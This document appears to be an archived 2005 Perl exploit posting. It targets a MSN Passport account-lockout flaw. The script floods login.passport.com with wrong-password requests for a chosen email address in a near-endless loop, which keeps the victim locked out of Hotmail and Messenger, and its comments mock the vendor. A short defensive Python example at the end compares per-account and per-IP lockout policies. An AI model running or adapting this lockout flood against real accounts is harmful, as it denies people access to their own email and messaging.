MSN Passport accounts remote DoS code

    [Cloudy May 5, 2007 12:00]
#!/usr/bin/perl
#
# by: Simo aka _6mO_HaCk
# 1 december 2005
# MorX security research team
# www.morx.org
#
# Details:
#
# it seems that msn passport users using services such as hotmail email and msn messenger and more
# are vulnerable to a remote denial of service that allows any remote attacker to block access
# to their accounts. this problem is produced by the passport login server (login.passport.com),
# which locks users' accounts when receiving wrong passwords instead of blocking the IP address
# from which the wrong passwords are being sent, so if an attacker knows a target email, the
# vulnerability can be exploited by sending continuous wrong passwords to login.passport.com:80.
# after a certain number of wrong attempts the account will be blocked, preventing the victim from
# logging in to the whole msn passport network, including email and Instant Messaging services, until the
# attacker stops the attack
#
# Note: The attack must start before the victim logs in. Once the attack starts the victim
# will be unable to sign in.
#
# i would like to apologize in advance if this is a known issue, however this vulnerability is still
# exploitable and it's a very serious problem. hopefully the fact that i'm publishing this info and
# this proof of concept exploit will push Mcft to patch their server soon
#
# Vulnerable:
# login.passport.com (used for authentication of all accounts except the ones at msn.com)
# : blocks the account instead of the IP address
#
# Not vulnerable:
# msnialogin.passport.com (used only for authentication of accounts at msn.com)
# : blocks the IP address instead of the account, giving the remote attacker no choice except
# if the attacker can pass the attack through the victim's IP address or if the attacker is
# connected from the same LAN, sharing the same IP address with the target
#
# Thanks to massine and handrix for helping me test this
#
# PoC: www.morx.org/~censored~.txt

use IO::Socket;

if(!defined($ARGV[0])) {

system (clear);
print "\n";
print "=================================================\n";
print "--- MSN Passport accounts remote DoS by _6mO_HaCk\n";
print "--- MorX Security Research Team www.MorX.org\n";
print "=================================================\n";
print "--- Usage: perl $0 \n\n";
exit; }

$TARGET        = $ARGV[0];
$PORT          = "80";
$SERVER        = "login.passport.com";
$PASSWORD      = "~censored~"; # MSNs nobody like them, fux0r them ... ;>
$KEYS          = "lc=1033,id=507,tw=40,fs=1,ru=http%3A%2F%2Fmessenger%2Emsn%2Ecom,ct=1131803266,kpp=1,kv=7,ver=2.1.6000.1,rn=Oyx2lzO3,tpf=a9aa21fdbc1350435849d9fd05849cb7";
$NUMBER        = "99999999999999999999999999999999999999999999999999999";

#################################

$COMMAND1      = "GET /login2.srf HTTP/1.0";
$COMMAND2      = "Accept: */*";
$COMMAND3      = "Authorization: Passport1.4 OrgVerb=GET,OrgURL=http%3A%2F%2Fmessenger%2Emsn%2Ecom,sign-in=$TARGET,pwd=$PASSWORD,$KEYS";



print "=================================================\n";
print "--- MSN Passport accounts remote DoS by _6mO_HaCk\n";
print "--- MorX Security Research Team www.MorX.org\n";
print "=================================================\n";
print "[+] Attacking $TARGET ...\n";
print "[-] CTRL + C To Stop\n";
for($count=0;$count<=$NUMBER;$count++)
{
$remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$SERVER",PeerPort=>"$PORT")
|| die "Can't connect to $SERVER";
print $remote "$COMMAND1\n$COMMAND2\n$COMMAND3\n\n";
$remote->autoflush();
}
print "Done, try again if needed :D";
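
The header comment contrasts two lockout policies: counting failures per account (login.passport.com) and counting them per source IP address (msnialogin.passport.com). The following is an added defensive illustration, not part of the original post and not any vendor's code, that models both policies so the effect on the legitimate owner can be compared. The threshold, the time window, all function and class names, and the addresses are assumptions constructed for the example.

```python
from collections import defaultdict, deque

MAX_FAILURES = 5       # assumed threshold; the post only says "a certain number"
WINDOW_SECONDS = 300   # assumed sliding window for counting failures

class FailureThrottle:
    """Counts failed logins per key inside a sliding time window."""
    def __init__(self, key_fn):
        self.key_fn = key_fn               # maps (account, ip) to the throttled key
        self.failures = defaultdict(deque)

    def _recent(self, key, now):
        q = self.failures[key]
        while q and now - q[0] > WINDOW_SECONDS:
            q.popleft()                    # forget failures outside the window
        return q

    def is_blocked(self, account, ip, now):
        return len(self._recent(self.key_fn(account, ip), now)) >= MAX_FAILURES

    def record_failure(self, account, ip, now):
        self._recent(self.key_fn(account, ip), now).append(now)

def per_account():
    """Policy the post attributes to login.passport.com: lock the account."""
    return FailureThrottle(lambda account, ip: account)

def per_source_ip():
    """Policy the post attributes to msnialogin.passport.com: block the sender."""
    return FailureThrottle(lambda account, ip: ip)

def simulate(throttle):
    """Constructed scenario: ten bad passwords from one address, then the owner signs in."""
    sender_ip, owner_ip = "198.51.100.7", "203.0.113.20"   # documentation ranges
    account = "user@example.com"                            # constructed account name
    for t in range(10):
        if not throttle.is_blocked(account, sender_ip, now=t):
            throttle.record_failure(account, sender_ip, now=t)
    return {
        "owner_blocked": throttle.is_blocked(account, owner_ip, now=11),
        "sender_blocked": throttle.is_blocked(account, sender_ip, now=11),
        # Once the failures age out of the window, the lock clears by itself.
        "owner_blocked_after_quiet_window":
            throttle.is_blocked(account, owner_ip, now=WINDOW_SECONDS + 10),
    }
```

Keying on the source address keeps the owner able to sign in from elsewhere, but an owner who shares the sender's address (the same-LAN case noted in the header comment) is still blocked.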